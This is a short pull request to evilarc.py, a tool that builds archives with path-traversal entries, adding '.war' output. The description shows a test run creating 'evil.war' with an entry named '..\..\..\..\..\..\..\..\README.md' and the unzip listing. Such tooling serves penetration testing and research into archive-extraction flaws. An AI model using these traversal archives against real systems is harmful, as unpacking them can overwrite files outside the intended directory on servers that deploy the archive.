### PR TITLE
Add support for .war output

### DIFF
--- a/evilarc.py
+++ b/evilarc.py
@@ -68,7 +68,7 @@ def main(argv=sys.argv):
 		wmode = 'a'
 	else:
 		wmode = 'w'
-	if ext == ".zip" or ext == ".jar":
+	if ext == ".zip" or ext == ".jar" or ext == ".war":
 		zf = zipfile.ZipFile(options.out, wmode)
 		zf.write(fname, zpath)
 		zf.close()


### PR DESCRIPTION
Tested on Ubuntu 12.04:

```
$ python evilarc.py -f evil.war README.md 
Creating evil.war containing ..\..\..\..\..\..\..\..\README.md
$ unzip -l evil.war 
Archive:  evil.war
  Length      Date    Time    Name
---------  ---------- -----   ----
      616  2015-02-10 14:50   ..\..\..\..\..\..\..\..\README.md
---------                     -------
      616                     1 file
```
